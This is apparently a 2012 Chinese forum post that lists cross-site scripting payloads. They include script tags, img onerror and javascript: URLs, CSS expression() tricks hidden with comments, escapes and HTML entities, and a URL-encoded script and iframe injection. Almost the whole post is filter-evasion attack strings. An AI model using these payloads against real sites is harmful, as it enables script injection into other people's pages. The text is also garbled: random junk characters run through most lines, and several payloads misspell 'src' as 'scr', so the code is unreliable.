<script>alert("跨站")</script> (最常用)* s7 O8 X) X2 o2 |5 g7 K2 a
<img scr=javascript:alert("跨站")></img>: n8 N/ R- x) D2 ?6 o: k
<img scr="javascript: alert(/跨站/)></img>
% `( S' A. z8 ]<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
q5 C% |1 N" s# h<img scr="#" onerror=alert(/跨站/)></img># v, K+ C$ G& ]# N6 K/ x
<img scr="#" style="xss:expression(alert(/xss/));"></img>) m2 M5 ? M$ B N4 J
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)* x' n# x& F: s9 ^- c9 f) ~
<img src=vbscript:msgbox ("xss")></img>* c5 w# U. f$ w3 s5 p. G- s$ y
<style> input {left:expression (alert('xss'))}</style>" z+ _+ Z3 L c G* m, ^9 }3 r
<div style={left:expression (alert('xss'))}></div>
0 @9 j& Z* a$ s<div style={left:exp/* */ression (alert('xss'))}></div>
# V% w0 i2 r9 G: {2 ]+ M9 J; ~, e<div style={left:\0065\0078ression (alert('xss'))}></div>" c* f. C6 Y' ?3 ^" h
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>/ @0 J5 R( ?! ` q! O2 }
unicode <div style="{left:expRessioN (alert('xss'))}">3 g+ `1 Q' r7 f+ \& q
& w/ E; S! R& D7 r
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>[": t; z7 e4 i, |9 u7 o7 Z
|
发表于 2012-9-15 14:09:13
收藏
支持
反对